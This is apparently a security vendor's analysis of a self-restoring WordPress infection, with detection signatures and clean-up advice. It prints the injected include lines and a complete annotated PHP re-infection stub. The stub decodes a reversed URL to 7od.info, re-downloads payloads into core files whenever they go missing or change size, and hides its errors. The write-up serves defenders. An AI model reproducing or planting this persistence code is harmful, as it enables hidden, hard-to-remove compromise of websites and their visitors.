Today we found undetected malware that keeps itself hidden and tries to reload itself if it is deleted.
We generated signatures to detect these hidden includes:
/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND
/wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND
/wp-includes/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND
/wp-includes/Requests/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND
/wp-includes/js/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND
WordPress
index.php
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */@include( dirname( __FILE__ ) . '/wp-includes/js/utilities.js' ); /**
wp-load.php
Appended at the end of the file:
} // Network host configuration. Not recommended edit this code! @include ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );
template.php
// Analysis note: this block is the re-infection / persistence stub the post reports
// inside wp-includes/template.php. It does not carry the payload itself; it re-downloads
// four artifacts (index.php, wp-includes/js/utilities.js, wp-includes/Requests/IPconfig.ini
// and an appendix for wp-load.php) whenever one is missing or has an unexpected size.
// Defender takeaway: removing only the dropped files is not enough -- this block restores
// them on the next request, so it must be removed in the same clean-up, and outbound
// requests to the decoded host below are a usable network indicator.

// Silence PHP warnings/notices so failed curl/unlink/file_put_contents calls leave no trace in logs.
error_reporting(0);

// Reversed-string obfuscation; strrev() yields 'http://7od.info/wordpress/' (the host named in the
// page's signature Malware.Expert.malware.url.7od.info). Each download below appends a path to it.
$wp_support = strrev ( '/wordpress/ofni.do7//:ptth' );

// --- index.php (site root, relative to the current working directory) ---
// Missing -> fetch '<url>index' and write it as ./index.php. The unlink() before the write is
// a no-op here since is_file() was false; it only matters in the size-check branch below.
if ( is_file ( './index.php' ) == false ) {
    $wp_up_data = curl_init ( $wp_support.'index' );
    curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
    curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
    $wp_ip_data = curl_exec ( $wp_up_data );
    curl_close ( $wp_up_data );
    unlink ( './index.php' );
    file_put_contents ( './index.php', $wp_ip_data );
}
// Present -> treat any size outside 499..500 bytes as "cleaned/restored" and overwrite it again.
// (A stock WordPress index.php that was disinfected would fall outside this window, hence the
// "comes back after deletion" behaviour described in the post.)
if ( is_file ( './index.php' ) ) {
    if ( filesize ( './index.php' ) <= 498 OR filesize ( './index.php' ) >= 501 ) {
        $wp_up_data = curl_init ( $wp_support.'index' );
        curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
        curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
        $wp_ip_data = curl_exec ( $wp_up_data );
        curl_close ( $wp_up_data );
        unlink ( './index.php' );
        file_put_contents ( './index.php', $wp_ip_data );
    }
}

// --- wp-includes/js/utilities.js (the file index.php is made to @include; PHP code under a .js name) ---
// Missing -> fetch '<url>utilities' and write it under ABSPATH . WPINC.
if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) == false ) {
    $wp_up_data = curl_init ( $wp_support.'utilities' );
    curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
    curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
    $wp_ip_data = curl_exec ( $wp_up_data );
    curl_close ( $wp_up_data );
    unlink ( ABSPATH . WPINC . '/js/utilities.js' );
    file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data );
}
// Present -> re-download unless the size is within 77101..88099 bytes.
if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) ) {
    if ( filesize ( ABSPATH . WPINC . '/js/utilities.js' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/js/utilities.js' ) >= 88100 ) {
        $wp_up_data = curl_init ( $wp_support.'utilities' );
        curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
        curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
        $wp_ip_data = curl_exec ( $wp_up_data );
        curl_close ( $wp_up_data );
        unlink ( ABSPATH . WPINC . '/js/utilities.js' );
        file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data );
    }
}

// --- wp-includes/Requests/IPconfig.ini + wp-load.php hook ---
// Everything below runs only while ./wp-content/uploads/slideshow/cache.ini does NOT exist.
// NOTE(analysis): presumably a marker/kill-switch controlled by the operator -- the code never
// creates it, so its meaning cannot be confirmed from this block alone. Its presence on a host is
// itself worth noting during incident review.
if ( is_file ( './wp-content/uploads/slideshow/cache.ini' ) == false ) {
    // Missing -> fetch '<url>ipconfig' and write it as IPconfig.ini (PHP code under an .ini name).
    if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) == false ) {
        $wp_up_data = curl_init ( $wp_support.'ipconfig' );
        curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
        curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
        $wp_ip_data = curl_exec ( $wp_up_data );
        curl_close ( $wp_up_data );
        unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );
        file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data );
    }
    // Present -> same 77101..88099 byte window as utilities.js, re-download otherwise.
    if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) ) {
        if ( filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) >= 88100 ) {
            $wp_up_data = curl_init ( $wp_support.'ipconfig' );
            curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
            curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
            $wp_ip_data = curl_exec ( $wp_up_data );
            curl_close ( $wp_up_data );
            unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );
            file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data );
        }
    }
    // If wp-load.php no longer mentions 'IPconfig.ini', fetch '<url>wpload' and APPEND it to
    // wp-load.php (FILE_APPEND, no unlink) -- this is how the trailing
    // "@include ( ABSPATH . WPINC . '/Requests/IPconfig.ini' )" line shown in the post gets there.
    // Consequence for clean-up: stripping that line from wp-load.php triggers re-append on the next
    // request as long as this block and the cache.ini gate condition remain.
    if ( stripos ( file_get_contents ( './wp-load.php' ), 'IPconfig.ini' ) == false ) {
        $wp_up_data = curl_init ( $wp_support.'wpload' );
        curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 );
        curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
        $wp_ip_data = curl_exec ( $wp_up_data );
        curl_close ( $wp_up_data );
        file_put_contents ( './wp-load.php', $wp_ip_data, FILE_APPEND );
    }
}
IPconfig.ini
Remove this file (it is re-created by the template.php block above, so remove that block in the same clean-up).
utilities.js
Remove this file (it is re-created by the template.php block above, so remove that block in the same clean-up).
Final Words
Use Malware Expert signatures to detect this malware in your files for FREE!